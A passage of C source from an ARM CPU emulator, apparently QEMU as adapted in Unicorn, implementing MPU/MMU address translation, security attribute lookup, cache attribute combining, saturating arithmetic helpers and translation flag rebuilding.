*prot |= PAGE_READ | PAGE_EXEC; break; case 7: /* for v7M, same as 6; for R profile a reserved value */ if (arm_feature(env, ARM_FEATURE_M)) { *prot |= PAGE_READ | PAGE_EXEC; break; } /* fall through */ default: qemu_log_mask(LOG_GUEST_ERROR, "DRACR[%d]: Bad value for AP bits: 0x%" PRIx32 "\n", n, ap); } } /* execute never */ if (xn) { *prot &= ~PAGE_EXEC; } } } fi->type = ARMFault_Permission; fi->level = 1; return !(*prot & (1 << access_type)); } void v8m_security_lookup(CPUARMState *env, uint32_t address, MMUAccessType access_type, ARMMMUIdx mmu_idx, V8M_SAttributes *sattrs) { #if 0 /* Look up the security attributes for this address. Compare the * pseudocode SecurityCheck() function. * We assume the caller has zero-initialized *sattrs. */ ARMCPU *cpu = env_archcpu(env); int r; bool idau_exempt = false, idau_ns = true, idau_nsc = true; int idau_region = IREGION_NOTVALID; uint32_t addr_page_base = address & TARGET_PAGE_MASK; uint32_t addr_page_limit = addr_page_base + (TARGET_PAGE_SIZE - 1); if (cpu->idau) { IDAUInterfaceClass *iic = IDAU_INTERFACE_GET_CLASS(cpu->idau); IDAUInterface *ii = IDAU_INTERFACE(cpu->idau); iic->check(ii, address, &idau_region, &idau_exempt, &idau_ns, &idau_nsc); } if (access_type == MMU_INST_FETCH && extract32(address, 28, 4) == 0xf) { /* 0xf0000000..0xffffffff is always S for insn fetches */ return; } if (idau_exempt || v8m_is_sau_exempt(env, address, access_type)) { sattrs->ns = !regime_is_secure(env, mmu_idx); return; } if (idau_region != IREGION_NOTVALID) { sattrs->irvalid = true; sattrs->iregion = idau_region; } switch (env->sau.ctrl & 3) { case 0: /* SAU.ENABLE == 0, SAU.ALLNS == 0 */ break; case 2: /* SAU.ENABLE == 0, SAU.ALLNS == 1 */ sattrs->ns = true; break; default: /* SAU.ENABLE == 1 */ for (r = 0; r < cpu->sau_sregion; r++) { if (env->sau.rlar[r] & 1) { uint32_t base = env->sau.rbar[r] & ~0x1f; uint32_t limit = env->sau.rlar[r] | 0x1f; if (base <= address && limit >= address) { if (base > addr_page_base || limit < addr_page_limit) { sattrs->subpage = true; } if (sattrs->srvalid) { /* If we hit in more than one region then we must report * as Secure, not NS-Callable, with no valid region * number info. */ sattrs->ns = false; sattrs->nsc = false; sattrs->sregion = 0; sattrs->srvalid = false; break; } else { if (env->sau.rlar[r] & 2) { sattrs->nsc = true; } else { sattrs->ns = true; } sattrs->srvalid = true; sattrs->sregion = r; } } else { /* * Address not in this region. We must check whether the * region covers addresses in the same page as our address. * In that case we must not report a size that covers the * whole page for a subsequent hit against a different MPU * region or the background region, because it would result * in incorrect TLB hits for subsequent accesses to * addresses that are in this MPU region. */ if (limit >= base && ranges_overlap(base, limit - base + 1, addr_page_base, TARGET_PAGE_SIZE)) { sattrs->subpage = true; } } } } break; } /* * The IDAU will override the SAU lookup results if it specifies * higher security than the SAU does. */ if (!idau_ns) { if (sattrs->ns || (!idau_nsc && sattrs->nsc)) { sattrs->ns = false; sattrs->nsc = idau_nsc; } } #endif } bool pmsav8_mpu_lookup(CPUARMState *env, uint32_t address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, MemTxAttrs *txattrs, int *prot, bool *is_subpage, ARMMMUFaultInfo *fi, uint32_t *mregion) { struct uc_struct *uc = env->uc; /* Perform a PMSAv8 MPU lookup (without also doing the SAU check * that a full phys-to-virt translation does). * mregion is (if not NULL) set to the region number which matched, * or -1 if no region number is returned (MPU off, address did not * hit a region, address hit in multiple regions). * We set is_subpage to true if the region hit doesn't cover the * entire TARGET_PAGE the address is within. */ ARMCPU *cpu = env_archcpu(env); bool is_user = regime_is_user(env, mmu_idx); uint32_t secure = regime_is_secure(env, mmu_idx); int n; int matchregion = -1; bool hit = false; uint32_t addr_page_base = address & TARGET_PAGE_MASK; uint32_t addr_page_limit = addr_page_base + (TARGET_PAGE_SIZE - 1); *is_subpage = false; *phys_ptr = address; *prot = 0; if (mregion) { *mregion = -1; } /* Unlike the ARM ARM pseudocode, we don't need to check whether this * was an exception vector read from the vector table (which is always * done using the default system address map), because those accesses * are done in arm_v7m_load_vector(), which always does a direct * read using address_space_ldl(), rather than going via this function. */ if (regime_translation_disabled(env, mmu_idx)) { /* MPU disabled */ hit = true; } else if (m_is_ppb_region(env, address)) { hit = true; } else { if (pmsav7_use_background_region(cpu, mmu_idx, is_user)) { hit = true; } for (n = (int)cpu->pmsav7_dregion - 1; n >= 0; n--) { /* region search */ /* Note that the base address is bits [31:5] from the register * with bits [4:0] all zeroes, but the limit address is bits * [31:5] from the register with bits [4:0] all ones. */ uint32_t base = env->pmsav8.rbar[secure][n] & ~0x1f; uint32_t limit = env->pmsav8.rlar[secure][n] | 0x1f; if (!(env->pmsav8.rlar[secure][n] & 0x1)) { /* Region disabled */ continue; } if (address < base || address > limit) { /* * Address not in this region. We must check whether the * region covers addresses in the same page as our address. * In that case we must not report a size that covers the * whole page for a subsequent hit against a different MPU * region or the background region, because it would result in * incorrect TLB hits for subsequent accesses to addresses that * are in this MPU region. */ if (limit >= base && ranges_overlap(base, limit - base + 1, addr_page_base, TARGET_PAGE_SIZE)) { *is_subpage = true; } continue; } if (base > addr_page_base || limit < addr_page_limit) { *is_subpage = true; } if (matchregion != -1) { /* Multiple regions match -- always a failure (unlike * PMSAv7 where highest-numbered-region wins) */ fi->type = ARMFault_Permission; fi->level = 1; return true; } matchregion = n; hit = true; } } if (!hit) { /* background fault */ fi->type = ARMFault_Background; return true; } if (matchregion == -1) { /* hit using the background region */ get_phys_addr_pmsav7_default(env, mmu_idx, address, prot); } else { uint32_t ap = extract32(env->pmsav8.rbar[secure][matchregion], 1, 2); uint32_t xn = extract32(env->pmsav8.rbar[secure][matchregion], 0, 1); if (m_is_system_region(env, address)) { /* System space is always execute never */ xn = 1; } *prot = simple_ap_to_rw_prot(env, mmu_idx, ap); if (*prot && !xn) { *prot |= PAGE_EXEC; } /* We don't need to look the attribute up in the MAIR0/MAIR1 * registers because that only tells us about cacheability. */ if (mregion) { *mregion = matchregion; } } fi->type = ARMFault_Permission; fi->level = 1; return !(*prot & (1 << access_type)); } static bool get_phys_addr_pmsav8(CPUARMState *env, uint32_t address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, MemTxAttrs *txattrs, int *prot, target_ulong *page_size, ARMMMUFaultInfo *fi) { struct uc_struct *uc = env->uc; uint32_t secure = regime_is_secure(env, mmu_idx); V8M_SAttributes sattrs = { 0 }; bool ret; bool mpu_is_subpage; if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { v8m_security_lookup(env, address, access_type, mmu_idx, &sattrs); if (access_type == MMU_INST_FETCH) { /* Instruction fetches always use the MMU bank and the * transaction attribute determined by the fetch address, * regardless of CPU state. This is painful for QEMU * to handle, because it would mean we need to encode * into the mmu_idx not just the (user, negpri) information * for the current security state but also that for the * other security state, which would balloon the number * of mmu_idx values needed alarmingly. * Fortunately we can avoid this because it's not actually * possible to arbitrarily execute code from memory with * the wrong security attribute: it will always generate * an exception of some kind or another, apart from the * special case of an NS CPU executing an SG instruction * in S&NSC memory. So we always just fail the translation * here and sort things out in the exception handler * (including possibly emulating an SG instruction). */ if (sattrs.ns != !secure) { if (sattrs.nsc) { fi->type = ARMFault_QEMU_NSCExec; } else { fi->type = ARMFault_QEMU_SFault; } *page_size = sattrs.subpage ? 1 : TARGET_PAGE_SIZE; *phys_ptr = address; *prot = 0; return true; } } else { /* For data accesses we always use the MMU bank indicated * by the current CPU state, but the security attributes * might downgrade a secure access to nonsecure. */ if (sattrs.ns) { txattrs->secure = false; } else if (!secure) { /* NS access to S memory must fault. * Architecturally we should first check whether the * MPU information for this address indicates that we * are doing an unaligned access to Device memory, which * should generate a UsageFault instead. QEMU does not * currently check for that kind of unaligned access though. * If we added it we would need to do so as a special case * for M_FAKE_FSR_SFAULT in arm_v7m_cpu_do_interrupt(). */ fi->type = ARMFault_QEMU_SFault; *page_size = sattrs.subpage ? 1 : TARGET_PAGE_SIZE; *phys_ptr = address; *prot = 0; return true; } } } ret = pmsav8_mpu_lookup(env, address, access_type, mmu_idx, phys_ptr, txattrs, prot, &mpu_is_subpage, fi, NULL); *page_size = sattrs.subpage || mpu_is_subpage ? 1 : TARGET_PAGE_SIZE; return ret; } static bool get_phys_addr_pmsav5(CPUARMState *env, uint32_t address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, int *prot, ARMMMUFaultInfo *fi) { int n; uint32_t mask; uint32_t base; bool is_user = regime_is_user(env, mmu_idx); if (regime_translation_disabled(env, mmu_idx)) { /* MPU disabled. */ *phys_ptr = address; *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return false; } *phys_ptr = address; for (n = 7; n >= 0; n--) { base = env->cp15.c6_region[n]; if ((base & 1) == 0) { continue; } mask = 1 << ((base >> 1) & 0x1f); /* Keep this shift separate from the above to avoid an (undefined) << 32. */ mask = (mask << 1) - 1; if (((base ^ address) & ~mask) == 0) { break; } } if (n < 0) { fi->type = ARMFault_Background; return true; } if (access_type == MMU_INST_FETCH) { mask = env->cp15.pmsav5_insn_ap; } else { mask = env->cp15.pmsav5_data_ap; } mask = (mask >> (n * 4)) & 0xf; switch (mask) { case 0: fi->type = ARMFault_Permission; fi->level = 1; return true; case 1: if (is_user) { fi->type = ARMFault_Permission; fi->level = 1; return true; } *prot = PAGE_READ | PAGE_WRITE; break; case 2: *prot = PAGE_READ; if (!is_user) { *prot |= PAGE_WRITE; } break; case 3: *prot = PAGE_READ | PAGE_WRITE; break; case 5: if (is_user) { fi->type = ARMFault_Permission; fi->level = 1; return true; } *prot = PAGE_READ; break; case 6: *prot = PAGE_READ; break; default: /* Bad permission. */ fi->type = ARMFault_Permission; fi->level = 1; return true; } *prot |= PAGE_EXEC; return false; } /* Combine either inner or outer cacheability attributes for normal * memory, according to table D4-42 and pseudocode procedure * CombineS1S2AttrHints() of ARM DDI 0487B.b (the ARMv8 ARM). * * NB: only stage 1 includes allocation hints (RW bits), leading to * some asymmetry. */ static uint8_t combine_cacheattr_nibble(uint8_t s1, uint8_t s2) { if (s1 == 4 || s2 == 4) { /* non-cacheable has precedence */ return 4; } else if (extract32(s1, 2, 2) == 0 || extract32(s1, 2, 2) == 2) { /* stage 1 write-through takes precedence */ return s1; } else if (extract32(s2, 2, 2) == 2) { /* stage 2 write-through takes precedence, but the allocation hint * is still taken from stage 1 */ return (2 << 2) | extract32(s1, 0, 2); } else { /* write-back */ return s1; } } /* Combine S1 and S2 cacheability/shareability attributes, per D4.5.4 * and CombineS1S2Desc() * * @s1: Attributes from stage 1 walk * @s2: Attributes from stage 2 walk */ static ARMCacheAttrs combine_cacheattrs(ARMCacheAttrs s1, ARMCacheAttrs s2) { uint8_t s1lo = extract32(s1.attrs, 0, 4), s2lo = extract32(s2.attrs, 0, 4); uint8_t s1hi = extract32(s1.attrs, 4, 4), s2hi = extract32(s2.attrs, 4, 4); ARMCacheAttrs ret; /* Combine shareability attributes (table D4-43) */ if (s1.shareability == 2 || s2.shareability == 2) { /* if either are outer-shareable, the result is outer-shareable */ ret.shareability = 2; } else if (s1.shareability == 3 || s2.shareability == 3) { /* if either are inner-shareable, the result is inner-shareable */ ret.shareability = 3; } else { /* both non-shareable */ ret.shareability = 0; } /* Combine memory type and cacheability attributes */ if (s1hi == 0 || s2hi == 0) { /* Device has precedence over normal */ if (s1lo == 0 || s2lo == 0) { /* nGnRnE has precedence over anything */ ret.attrs = 0; } else if (s1lo == 4 || s2lo == 4) { /* non-Reordering has precedence over Reordering */ ret.attrs = 4; /* nGnRE */ } else if (s1lo == 8 || s2lo == 8) { /* non-Gathering has precedence over Gathering */ ret.attrs = 8; /* nGRE */ } else { ret.attrs = 0xc; /* GRE */ } /* Any location for which the resultant memory type is any * type of Device memory is always treated as Outer Shareable. */ ret.shareability = 2; } else { /* Normal memory */ /* Outer/inner cacheability combine independently */ ret.attrs = combine_cacheattr_nibble(s1hi, s2hi) << 4 | combine_cacheattr_nibble(s1lo, s2lo); if (ret.attrs == 0x44) { /* Any location for which the resultant memory type is Normal * Inner Non-cacheable, Outer Non-cacheable is always treated * as Outer Shareable. */ ret.shareability = 2; } } return ret; } /* get_phys_addr - get the physical address for this virtual address * * Find the physical address corresponding to the given virtual address, * by doing a translation table walk on MMU based systems or using the * MPU state on MPU based systems. * * Returns false if the translation was successful. Otherwise, phys_ptr, attrs, * prot and page_size may not be filled in, and the populated fsr value provides * information on why the translation aborted, in the format of a * DFSR/IFSR fault register, with the following caveats: * * we honour the short vs long DFSR format differences. * * the WnR bit is never set (the caller must do this). * * for PSMAv5 based systems we don't bother to return a full FSR format * value. * * @env: CPUARMState * @address: virtual address to get physical address for * @access_type: 0 for read, 1 for write, 2 for execute * @mmu_idx: MMU index indicating required translation regime * @phys_ptr: set to the physical address corresponding to the virtual address * @attrs: set to the memory transaction attributes to use * @prot: set to the permissions for the page containing phys_ptr * @page_size: set to the size of the page containing phys_ptr * @fi: set to fault info if the translation fails * @cacheattrs: (if non-NULL) set to the cacheability/shareability attributes */ bool get_phys_addr(CPUARMState *env, target_ulong address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, MemTxAttrs *attrs, int *prot, target_ulong *page_size, ARMMMUFaultInfo *fi, ARMCacheAttrs *cacheattrs) { struct uc_struct *uc = env->uc; if (mmu_idx == ARMMMUIdx_E10_0 || mmu_idx == ARMMMUIdx_E10_1 || mmu_idx == ARMMMUIdx_E10_1_PAN) { /* Call ourselves recursively to do the stage 1 and then stage 2 * translations. */ if (arm_feature(env, ARM_FEATURE_EL2)) { hwaddr ipa; int s2_prot; int ret; ARMCacheAttrs cacheattrs2 = { 0 }; ret = get_phys_addr(env, address, access_type, stage_1_mmu_idx(mmu_idx), &ipa, attrs, prot, page_size, fi, cacheattrs); /* If S1 fails or S2 is disabled, return early. */ if (ret || regime_translation_disabled(env, ARMMMUIdx_Stage2)) { *phys_ptr = ipa; return ret; } /* S1 is done. Now do S2 translation. */ ret = get_phys_addr_lpae(env, ipa, access_type, ARMMMUIdx_Stage2, phys_ptr, attrs, &s2_prot, page_size, fi, cacheattrs != NULL ? &cacheattrs2 : NULL); fi->s2addr = ipa; /* Combine the S1 and S2 perms. */ *prot &= s2_prot; /* Combine the S1 and S2 cache attributes, if needed */ if (!ret && cacheattrs != NULL) { if (env->cp15.hcr_el2 & HCR_DC) { /* * HCR.DC forces the first stage attributes to * Normal Non-Shareable, * Inner Write-Back Read-Allocate Write-Allocate, * Outer Write-Back Read-Allocate Write-Allocate. */ cacheattrs->attrs = 0xff; cacheattrs->shareability = 0; } *cacheattrs = combine_cacheattrs(*cacheattrs, cacheattrs2); } return ret; } else { /* * For non-EL2 CPUs a stage1+stage2 translation is just stage 1. */ mmu_idx = stage_1_mmu_idx(mmu_idx); } } /* The page table entries may downgrade secure to non-secure, but * cannot upgrade an non-secure translation regime's attributes * to secure. */ attrs->secure = regime_is_secure(env, mmu_idx); attrs->user = regime_is_user(env, mmu_idx); /* Fast Context Switch Extension. This doesn't exist at all in v8. * In v7 and earlier it affects all stage 1 translations. */ if (address < 0x02000000 && mmu_idx != ARMMMUIdx_Stage2 && !arm_feature(env, ARM_FEATURE_V8)) { if (regime_el(env, mmu_idx) == 3) { address += env->cp15.fcseidr_s; } else { address += env->cp15.fcseidr_ns; } } if (arm_feature(env, ARM_FEATURE_PMSA)) { bool ret; *page_size = TARGET_PAGE_SIZE; if (arm_feature(env, ARM_FEATURE_V8)) { /* PMSAv8 */ ret = get_phys_addr_pmsav8(env, address, access_type, mmu_idx, phys_ptr, attrs, prot, page_size, fi); } else if (arm_feature(env, ARM_FEATURE_V7)) { /* PMSAv7 */ ret = get_phys_addr_pmsav7(env, address, access_type, mmu_idx, phys_ptr, prot, page_size, fi); } else { /* Pre-v7 MPU */ ret = get_phys_addr_pmsav5(env, address, access_type, mmu_idx, phys_ptr, prot, fi); } qemu_log_mask(CPU_LOG_MMU, "PMSA MPU lookup for %s at 0x%08" PRIx32 " mmu_idx %u -> %s (prot %c%c%c)\n", access_type == MMU_DATA_LOAD ? "reading" : (access_type == MMU_DATA_STORE ? "writing" : "execute"), (uint32_t)address, mmu_idx, ret ? "Miss" : "Hit", *prot & PAGE_READ ? 'r' : '-', *prot & PAGE_WRITE ? 'w' : '-', *prot & PAGE_EXEC ? 'x' : '-'); return ret; } /* Definitely a real MMU, not an MPU */ if (regime_translation_disabled(env, mmu_idx)) { /* * MMU disabled. S1 addresses within aa64 translation regimes are * still checked for bounds -- see AArch64.TranslateAddressS1Off. */ if (mmu_idx != ARMMMUIdx_Stage2) { int r_el = regime_el(env, mmu_idx); if (arm_el_is_aa64(env, r_el)) { int pamax = arm_pamax(env_archcpu(env)); uint64_t tcr = env->cp15.tcr_el[r_el].raw_tcr; int addrtop, tbi; tbi = aa64_va_parameter_tbi(tcr, mmu_idx); if (access_type == MMU_INST_FETCH) { tbi &= ~aa64_va_parameter_tbid(tcr, mmu_idx); } tbi = (tbi >> extract64(address, 55, 1)) & 1; addrtop = (tbi ? 55 : 63); if (extract64(address, pamax, addrtop - pamax + 1) != 0) { fi->type = ARMFault_AddressSize; fi->level = 0; fi->stage2 = false; return 1; } /* * When TBI is disabled, we've just validated that all of the * bits above PAMax are zero, so logically we only need to * clear the top byte for TBI. But it's clearer to follow * the pseudocode set of addrdesc.paddress. */ address = extract64(address, 0, 52); } } *phys_ptr = address; *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; *page_size = TARGET_PAGE_SIZE; return 0; } if (regime_using_lpae_format(env, mmu_idx)) { return get_phys_addr_lpae(env, address, access_type, mmu_idx, phys_ptr, attrs, prot, page_size, fi, cacheattrs); } else if (regime_sctlr(env, mmu_idx) & SCTLR_XP) { return get_phys_addr_v6(env, address, access_type, mmu_idx, phys_ptr, attrs, prot, page_size, fi); } else { return get_phys_addr_v5(env, address, access_type, mmu_idx, phys_ptr, prot, page_size, fi); } } hwaddr arm_cpu_get_phys_page_attrs_debug(CPUState *cs, vaddr addr, MemTxAttrs *attrs) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; hwaddr phys_addr; target_ulong page_size; int prot; bool ret; ARMMMUFaultInfo fi = { 0 }; ARMMMUIdx mmu_idx = arm_mmu_idx(env); *attrs = (MemTxAttrs) { 0 }; ret = get_phys_addr(env, addr, 0, mmu_idx, &phys_addr, attrs, &prot, &page_size, &fi, NULL); if (ret) { return -1; } return phys_addr; } /* Note that signed overflow is undefined in C. The following routines are careful to use unsigned types where modulo arithmetic is required. Failure to do so _will_ break on newer gcc. */ /* Signed saturating arithmetic. */ /* Perform 16-bit signed saturating addition. */ static inline uint16_t add16_sat(uint16_t a, uint16_t b) { uint16_t res; res = a + b; if (((res ^ a) & 0x8000) && !((a ^ b) & 0x8000)) { if (a & 0x8000) res = 0x8000; else res = 0x7fff; } return res; } /* Perform 8-bit signed saturating addition. */ static inline uint8_t add8_sat(uint8_t a, uint8_t b) { uint8_t res; res = a + b; if (((res ^ a) & 0x80) && !((a ^ b) & 0x80)) { if (a & 0x80) res = 0x80; else res = 0x7f; } return res; } /* Perform 16-bit signed saturating subtraction. */ static inline uint16_t sub16_sat(uint16_t a, uint16_t b) { uint16_t res; res = a - b; if (((res ^ a) & 0x8000) && ((a ^ b) & 0x8000)) { if (a & 0x8000) res = 0x8000; else res = 0x7fff; } return res; } /* Perform 8-bit signed saturating subtraction. */ static inline uint8_t sub8_sat(uint8_t a, uint8_t b) { uint8_t res; res = a - b; if (((res ^ a) & 0x80) && ((a ^ b) & 0x80)) { if (a & 0x80) res = 0x80; else res = 0x7f; } return res; } #define ADD16(a, b, n) RESULT(add16_sat(a, b), n, 16); #define SUB16(a, b, n) RESULT(sub16_sat(a, b), n, 16); #define ADD8(a, b, n) RESULT(add8_sat(a, b), n, 8); #define SUB8(a, b, n) RESULT(sub8_sat(a, b), n, 8); #define PFX q #include "op_addsub.h" /* Unsigned saturating arithmetic. */ static inline uint16_t add16_usat(uint16_t a, uint16_t b) { uint16_t res; res = a + b; if (res < a) res = 0xffff; return res; } static inline uint16_t sub16_usat(uint16_t a, uint16_t b) { if (a > b) return a - b; else return 0; } static inline uint8_t add8_usat(uint8_t a, uint8_t b) { uint8_t res; res = a + b; if (res < a) res = 0xff; return res; } static inline uint8_t sub8_usat(uint8_t a, uint8_t b) { if (a > b) return a - b; else return 0; } #define ADD16(a, b, n) RESULT(add16_usat(a, b), n, 16); #define SUB16(a, b, n) RESULT(sub16_usat(a, b), n, 16); #define ADD8(a, b, n) RESULT(add8_usat(a, b), n, 8); #define SUB8(a, b, n) RESULT(sub8_usat(a, b), n, 8); #define PFX uq #include "op_addsub.h" /* Signed modulo arithmetic. */ #define SARITH16(a, b, n, op) do { \ int32_t sum; \ sum = (int32_t)(int16_t)(a) op (int32_t)(int16_t)(b); \ RESULT(sum, n, 16); \ if (sum >= 0) \ ge |= 3 << (n * 2); \ } while(0) #define SARITH8(a, b, n, op) do { \ int32_t sum; \ sum = (int32_t)(int8_t)(a) op (int32_t)(int8_t)(b); \ RESULT(sum, n, 8); \ if (sum >= 0) \ ge |= 1 << n; \ } while(0) #define ADD16(a, b, n) SARITH16(a, b, n, +) #define SUB16(a, b, n) SARITH16(a, b, n, -) #define ADD8(a, b, n) SARITH8(a, b, n, +) #define SUB8(a, b, n) SARITH8(a, b, n, -) #define PFX s #define ARITH_GE #include "op_addsub.h" /* Unsigned modulo arithmetic. */ #define ADD16(a, b, n) do { \ uint32_t sum; \ sum = (uint32_t)(uint16_t)(a) + (uint32_t)(uint16_t)(b); \ RESULT(sum, n, 16); \ if ((sum >> 16) == 1) \ ge |= 3 << (n * 2); \ } while(0) #define ADD8(a, b, n) do { \ uint32_t sum; \ sum = (uint32_t)(uint8_t)(a) + (uint32_t)(uint8_t)(b); \ RESULT(sum, n, 8); \ if ((sum >> 8) == 1) \ ge |= 1 << n; \ } while(0) #define SUB16(a, b, n) do { \ uint32_t sum; \ sum = (uint32_t)(uint16_t)(a) - (uint32_t)(uint16_t)(b); \ RESULT(sum, n, 16); \ if ((sum >> 16) == 0) \ ge |= 3 << (n * 2); \ } while(0) #define SUB8(a, b, n) do { \ uint32_t sum; \ sum = (uint32_t)(uint8_t)(a) - (uint32_t)(uint8_t)(b); \ RESULT(sum, n, 8); \ if ((sum >> 8) == 0) \ ge |= 1 << n; \ } while(0) #define PFX u #define ARITH_GE #include "op_addsub.h" /* Halved signed arithmetic. */ #define ADD16(a, b, n) \ RESULT(((int32_t)(int16_t)(a) + (int32_t)(int16_t)(b)) >> 1, n, 16) #define SUB16(a, b, n) \ RESULT(((int32_t)(int16_t)(a) - (int32_t)(int16_t)(b)) >> 1, n, 16) #define ADD8(a, b, n) \ RESULT(((int32_t)(int8_t)(a) + (int32_t)(int8_t)(b)) >> 1, n, 8) #define SUB8(a, b, n) \ RESULT(((int32_t)(int8_t)(a) - (int32_t)(int8_t)(b)) >> 1, n, 8) #define PFX sh #include "op_addsub.h" /* Halved unsigned arithmetic. */ #define ADD16(a, b, n) \ RESULT(((uint32_t)(uint16_t)(a) + (uint32_t)(uint16_t)(b)) >> 1, n, 16) #define SUB16(a, b, n) \ RESULT(((uint32_t)(uint16_t)(a) - (uint32_t)(uint16_t)(b)) >> 1, n, 16) #define ADD8(a, b, n) \ RESULT(((uint32_t)(uint8_t)(a) + (uint32_t)(uint8_t)(b)) >> 1, n, 8) #define SUB8(a, b, n) \ RESULT(((uint32_t)(uint8_t)(a) - (uint32_t)(uint8_t)(b)) >> 1, n, 8) #define PFX uh #include "op_addsub.h" static inline uint8_t do_usad(uint8_t a, uint8_t b) { if (a > b) return a - b; else return b - a; } /* Unsigned sum of absolute byte differences. */ uint32_t HELPER(usad8)(uint32_t a, uint32_t b) { uint32_t sum; sum = do_usad(a, b); sum += do_usad(a >> 8, b >> 8); sum += do_usad(a >> 16, b >>16); sum += do_usad(a >> 24, b >> 24); return sum; } /* For ARMv6 SEL instruction. */ uint32_t HELPER(sel_flags)(uint32_t flags, uint32_t a, uint32_t b) { uint32_t mask; mask = 0; if (flags & 1) mask |= 0xff; if (flags & 2) mask |= 0xff00; if (flags & 4) mask |= 0xff0000; if (flags & 8) mask |= 0xff000000; return (a & mask) | (b & ~mask); } /* CRC helpers. * The upper bytes of val (above the number specified by 'bytes') must have * been zeroed out by the caller. */ uint32_t HELPER(crc32)(uint32_t acc, uint32_t val, uint32_t bytes) { uint8_t buf[4]; stl_le_p(buf, val); return crc32(acc ^ 0xffffffff, buf, bytes) ^ 0xffffffff; } uint32_t HELPER(crc32c)(uint32_t acc, uint32_t val, uint32_t bytes) { uint8_t buf[4]; stl_le_p(buf, val); /* Linux crc32c converts the output to one's complement. */ return crc32c(acc, buf, bytes) ^ 0xffffffff; } /* Return the exception level to which FP-disabled exceptions should * be taken, or 0 if FP is enabled. */ int fp_exception_el(CPUARMState *env, int cur_el) { return 0; } /* Return the exception level we're running at if this is our mmu_idx */ int arm_mmu_idx_to_el(ARMMMUIdx mmu_idx) { if (mmu_idx & ARM_MMU_IDX_M) { return mmu_idx & ARM_MMU_IDX_M_PRIV; } switch (mmu_idx) { case ARMMMUIdx_E10_0: case ARMMMUIdx_E20_0: case ARMMMUIdx_SE10_0: return 0; case ARMMMUIdx_E10_1: case ARMMMUIdx_E10_1_PAN: case ARMMMUIdx_SE10_1: case ARMMMUIdx_SE10_1_PAN: return 1; case ARMMMUIdx_E2: case ARMMMUIdx_E20_2: case ARMMMUIdx_E20_2_PAN: return 2; case ARMMMUIdx_SE3: return 3; default: g_assert_not_reached(); // never reach here return 0; } } ARMMMUIdx arm_mmu_idx_el(CPUARMState *env, int el) { if (arm_feature(env, ARM_FEATURE_M)) { return arm_v7m_mmu_idx_for_secstate(env, env->v7m.secure); } /* See ARM pseudo-function ELIsInHost. */ switch (el) { case 0: if (arm_is_secure_below_el3(env)) { return ARMMMUIdx_SE10_0; } if ((env->cp15.hcr_el2 & (HCR_E2H | HCR_TGE)) == (HCR_E2H | HCR_TGE) && arm_el_is_aa64(env, 2)) { return ARMMMUIdx_E20_0; } return ARMMMUIdx_E10_0; case 1: if (arm_is_secure_below_el3(env)) { if (env->pstate & PSTATE_PAN) { return ARMMMUIdx_SE10_1_PAN; } return ARMMMUIdx_SE10_1; } if (env->pstate & PSTATE_PAN) { return ARMMMUIdx_E10_1_PAN; } return ARMMMUIdx_E10_1; case 2: /* TODO: ARMv8.4-SecEL2 */ /* Note that TGE does not apply at EL2. */ if ((env->cp15.hcr_el2 & HCR_E2H) && arm_el_is_aa64(env, 2)) { if (env->pstate & PSTATE_PAN) { return ARMMMUIdx_E20_2_PAN; } return ARMMMUIdx_E20_2; } return ARMMMUIdx_E2; case 3: return ARMMMUIdx_SE3; default: g_assert_not_reached(); // never reach here return 0; } } ARMMMUIdx arm_mmu_idx(CPUARMState *env) { return arm_mmu_idx_el(env, arm_current_el(env)); } ARMMMUIdx arm_stage1_mmu_idx(CPUARMState *env) { return stage_1_mmu_idx(arm_mmu_idx(env)); } static uint32_t rebuild_hflags_common(CPUARMState *env, int fp_el, ARMMMUIdx mmu_idx, uint32_t flags) { FIELD_DP32(flags, TBFLAG_ANY, FPEXC_EL, fp_el, flags); FIELD_DP32(flags, TBFLAG_ANY, MMUIDX, arm_to_core_mmu_idx(mmu_idx), flags); if (arm_singlestep_active(env)) { FIELD_DP32(flags, TBFLAG_ANY, SS_ACTIVE, 1, flags); } return flags; } static uint32_t rebuild_hflags_common_32(CPUARMState *env, int fp_el, ARMMMUIdx mmu_idx, uint32_t flags) { bool sctlr_b = arm_sctlr_b(env); if (sctlr_b) { FIELD_DP32(flags, TBFLAG_A32, SCTLR_B, 1, flags); } if (arm_cpu_data_is_big_endian_a32(env, sctlr_b)) { FIELD_DP32(flags, TBFLAG_ANY, BE_DATA, 1, flags); } FIELD_DP32(flags, TBFLAG_A32, NS, !access_secure_reg(env), flags); return rebuild_hflags_common(env, fp_el, mmu_idx, flags); } static uint32_t rebuild_hflags_m32(CPUARMState *env, int fp_el, ARMMMUIdx mmu_idx) { uint32_t flags = 0; if (arm_v7m_is_handler_mode(env)) { FIELD_DP32(flags, TBFLAG_M32, HANDLER, 1, flags); } /* * v8M always applies stack limit checks unless CCR.STKOFHFNMIGN * is suppressing them because the requested execution priority * is less than 0. */ if (arm_feature(env, ARM_FEATURE_V8) && !((mmu_idx & ARM_MMU_IDX_M_NEGPRI) && (env->v7m.ccr[env->v7m.secure] & R_V7M_CCR_STKOFHFNMIGN_MASK))) { FIELD_DP32(flags, TBFLAG_M32, STACKCHECK, 1, flags); } return rebuild_hflags_common_32(env, fp_el, mmu_idx, flags); } static uint32_t rebuild_hflags_aprofile(CPUARMState *env) { int flags = 0; FIELD_DP32(flags, TBFLAG_ANY, DEBUG_TARGET_EL, arm_debug_target_el(env), flags); return flags; } static uint32_t rebuild_hflags_a32(CPUARMState *env, int fp_el, ARMMMUIdx mmu_idx) { uint32_t flags = rebuild_hflags_aprofile(env); if (arm_el_is_aa64(env, 1)) { FIELD_DP32(flags, TBFLAG_A32, VFPEN, 1, flags); } if (arm_current_el(env) < 2 && env->cp15.hstr_el2 && (arm_hcr_el2_eff(env) & (HCR_E2H | HCR_TGE)) != (HCR_E2H | HCR_TGE)) { FIELD_DP32(flags, TBFLAG_A32, HSTR_ACTIVE, 1, flags); } return rebuild_hflags_common_32(env, fp_el, mmu_idx, flags); } static uint32_t rebuild_hflags_a64(CPUARMState *env, int el, int fp_el, ARMMMUIdx mmu_idx) { uint32_t flags = rebuild_hflags_aprofile(env); ARMMMUIdx stage1 = stage_1_mmu_idx(mmu_idx); uint64_t tcr = 